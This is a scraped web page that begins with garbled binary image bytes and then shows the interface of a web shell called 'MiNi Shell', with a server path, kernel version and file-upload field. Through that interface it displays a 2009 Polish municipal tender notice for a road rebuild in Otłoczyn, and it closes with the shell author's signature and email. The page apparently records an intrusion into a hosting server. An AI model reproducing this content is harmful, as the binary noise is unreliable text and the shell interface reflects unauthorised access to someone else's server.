JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090508/138342-N-2009.html

<p class="kh_header"><b>Aleksandrów Kujawski: Przebudowa drogi gminnej w miejscowości Otłoczyn, gmina Aleksandrów Kujawski</b><br>
<b>Numer ogłoszenia: 138342 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Aleksandrów Kujawski , ul. Słowackiego 12, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 054 2822031, 2822059 w. 37, faks 054 2822031, 2822059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug.aleksandrowkuj.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi gminnej w miejscowości Otłoczyn, gmina Aleksandrów Kujawski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Roboty przygotowawcze (CPV: 45100000-8):
1) Odtworzenie trasy i punktów wysokościowych w terenie równinnym - 1,16 km;

II. Roboty ziemne (PCV: 45110000-1):
2) Wykonanie wykopów mechanicznie w gruncie kat. III- 707,0 m3 ;
3) Wykonanie wykopów mechanicznie w gr. kat. II z transportem w nasyp- 99,0 m3;
4) Roboty ziemne poprzeczne na przerzut wykonane ręcznie- 231,0 m3;
5) Ręczne formowanie nasypów z zagęszczeniem z ziemi dostarczonej z wykopu oraz dokopu - 806,0 m3;
6) Wykonanie wykopów liniowych ręcznie o ścianach pionowych dla rur osłonowych- 35,4 m3;
7) Zasypanie wykopów liniowych gruntem rodzimym- 33,5 m3;

III. Podbudowa (CPV: 45233320-8): 
8) Wykonanie koryta mechanicznie wraz z profilowaniem i zagęszczaniem podłoża pod konstrukcję nawierzchni drogi- 5.647,0 m2 ;
9) Wykonanie koryta ręcznie wraz z profilowaniem i zagęszczaniem podłoża w gr. kat. I-VI pod konstrukcję nawierzchni zjazdów na drogi boczne- 419,0 m2;
10) Wykonanie koryta ręcznie wraz z profilowaniem i zagęszczaniem podłoża gr. kat. I-VI pod konstrukcję nawierzchni zjazdów indywidualnych- 390,4  m2; 
11) Wykonanie koryta ręcznie wraz z profilowaniem i zagęszczaniem podłoża  pod konstrukcję wzmocnienia poboczy - opaski tłuczniowej- 726,0 m2;
12) Wykonanie warstwy odsączającej - podsypki piaskowej z piasku grubości 10 cm pod drogą- 5.647,0 m2;
13) Wykonanie warstwy odsączającej - podsypki piaskowej z piasku grubości 10 cm pod  zjazdami - 809,4 m2;
14) Mechaniczne oczyszczanie  w-tw konstrukcyjnych;
- podbudowy tłuczniowej drogi i zjazdów- 6.358,9 m2, 
- warstwy wiążącej nawierzchni bitumicznej drogi- 5.416,0 m2;
15) Mechaniczne skropienie warstw konstrukcyjnych 
- podbudowy tłuczniowej drogi w ilości 0,4 kg/m2- 5.647,0 m2
-  podbudowy zjazdów w ilości 0,3 kg/m2 - 711,9 m2 ;
- warstwy wiążącej drogi w ilości 0,2 kg/m2 - 5.416,0 m2
16) wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie w-wa dolna grubości 15 cm pod drogą- 5.647,0 m2
17) Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie w-wa górna grubości 5 cm pod drogą- 5.647,0 m2
18) Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie grubości 15 cm pod zjazdami na drogi boczne- 381,4 m2;
19) Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie grubości 12 cm pod zjazdami indywidualnymi - 330,5 m2;
20) Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie grubości 10 cm pod umocnienie poboczy- opaski- 726,0 m2;

IV. Nawierzchnie bitumiczne (CPV: 45233220-7):
21) Wykonanie nawierzchni z betonu asfaltowego warstwa wiążąca grubości 4 cm- 5.416,0 m2;
22) Wykonanie nawierzchni z betonu asfaltowego warstwa ścieralna grubość warstwy 4 cm-
5.300,0 m2 ;
23) Wykonanie nawierzchni z betonu asfaltowego w-wa ścieralna grubości 4 cm na zjazdach -
711,9 m2;

V. Roboty wykończeniowe (CPV; 233120-6):
24) Ułożenie przepustów rurowych betonowych o średnicy 50 cm pod zjazdami na drogi boczne- 67,5 m;
25) Wykonanie ścianek czołowych z betonu B-20 dla przepustów z rur o średnicy 40 cm- 16 szt.
26) Uzupełnienie poboczy, skarp z profilowaniem i zagęszczaniem- 2.940,0 m2; 
27) Odtworzenie rowów z profilowaniem skarp rowu- 20 m;

VI. Urządzenia bezpieczeństwa ruchu (CPV: 45233290-8)
28) Ustawienie słupków z rur stalowych dla znaków drogowych pionowych- 6 szt.
29) Przymocowanie tarcz znaków drogowych odblaskowych do gotowych słupków - 9 szt.;

VII. Inne roboty (CPV: 45000000-7):
30)  Regulacja pionowa zaworów wodociągowych- 9 szt.;
31) Rura ochronna na przewodach telekomunikacyjnych z rur dwudzielnych o średnicy 150 mm- 101,0 m;
32) geodezyjny pomiar powykonawczy- 1,16 km..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający przewiduje konieczność wniesienia wadium przed upływem terminu składania ofert w wysokości 10.000,00 zł w sposób przewidziany w art. 45 ust. 6 ustawy. 
W przypadku wniesienia wadium w pieniądzu, Wykonawca wpłaca w/w określoną kwotę przelewem na rachunek bankowy wskazany w pkt 1 w specyfikacji istotnych warunków zamówienia. 

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie,
o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych
w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po
   stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
5. spełniają wszystkie warunki wynikające z punktu 12 Dokumenty i oświadczenia składające się na ofertę, 
6. wniosą wymagane wadium w terminie, formie i wysokości określonej niniejszą SIWZ,
7. wykażą się doświadczeniem w realizacji robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcie postępowania o  udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem co najmniej 3 roboty budowlane w kwocie nie mniejszej niż 700.000,00 zł brutto każda, robotom stanowiącym przedmiot zamówienia. 

Ocena spełniania powyższych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia
w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w punkcie 12 SIWZ dla ofert wspólnych także w punkcie 13 SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że powyższe warunki Wykonawca spełnił. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, lub którzy złożą dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału
w postępowaniu oraz spełnienie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
Niespełnienie chociażby jednego z warunków udziału z postępowania skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Wypełniony formularz ofertowy- załącznik nr 1 do SIWZ wraz z wypełnionym kosztorysem ofertowym (załącznik nr 7 do SIWZ),
2.   Dowód wniesienia wadium. 
3.  Zaakceptowany wzór umowy  lub oświadczenie o akceptacji warunków umowy -załącznik nr 2 do  SIWZ,
4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku składania oferty przez wykonawców występujących wspólnie, w/w dokument musi być złożony przez każdego wykonawcę);
5. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz
z informacjami na temat niezbędnych kwalifikacji do wykonania przedmiotu zamówienia (załącznik nr  3 do SIWZ ); Do wykazu należy dołączyć dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia i będą pełnić samodzielne funkcje techniczne posiadają  odpowiednie uprawnienia budowlane oraz  aktualne na dzień składania ofert, zaświadczenie o przynależności do Izby Inżynierów Budownictwa. 
6. Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcie postępowania o  udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem co najmniej 3 roboty budowlane w kwocie nie mniejszej niż 700.000,00 zł brutto każda, robotom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorcy; do wykazu należy załączyć kopie dokumentów potwierdzających, że roboty budowlane zostały należycie wykonane, (załącznik nr 4);
7. Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 prawa zamówień publicznych i nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art.24 ust. 1, 2 prawa zamówień publicznych- załącznik nr 5 do SIWZ;
8. Wykaz  niezbędnego  do  wykonania  zamówienia  sprzętu, jaki  posiada wykonawca lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego - załącznik nr 6;
9. Polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony
od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej w okresie niniejszego zamówienia na kwotę minimum 700.000,00 zł.

Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia, w przypadku złożona oferta, prócz dokumentów określonych w pkt 12 spełniać musi następujące wymogi:
a) W odniesieniu do wymagań postawionych przez Zamawiającego, Wykonawcy muszą  udokumentować, że łącznie spełniają warunki określone w art. 22 ust. 1 pkt 1-3 oraz każdy
z Wykonawców musi wykazać, że nie podlega wykluczeniu na podstawie art. 24 ust. 1, 2 ustawy,
b) Wykonawcy występujący wspólnie ustanawiają spośród siebie pełnomocnika do  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać: 
- wskazanie postępowania o zamówienie publiczne którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia,
- ustanowionego pełnomocnika oraz zakres jego umocowania, a także oświadczenie o przyjęciu
wspólnej, solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia, 
- powinien być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli,
wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej.
- dokument pełnomocnika należy przedstawić w formie oryginału lub poświadczonej za zgodność 
z oryginałem przez notariusza. 
c) Wszelka korespondencja oraz rozliczenia dokonane będą wyłącznie z przedsiębiorcą występującym
jako pełnomocnik.
d) Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed
podpisaniem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.

Dokumenty , o których mowa w punkcie 12 SIWZ i 13 SIWZ mogą być przedstawione w formie oryginałów  lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę oświadczenia, zobowiązania w oryginale..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ug.aleksandrowkuj.4bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Aleksandrów Kujawski
ul. Słowackiego 12
87-700 Aleksandrów Kujawski
woj. Kujawsko-pomorskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 10:00, miejsce: Urząd Gminy Aleksandrów Kujawski
ul. Słowackiego 12
87-700 Aleksandrów Kujawski
woj. Kujawsko-pomorskie
pok. nr 1 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com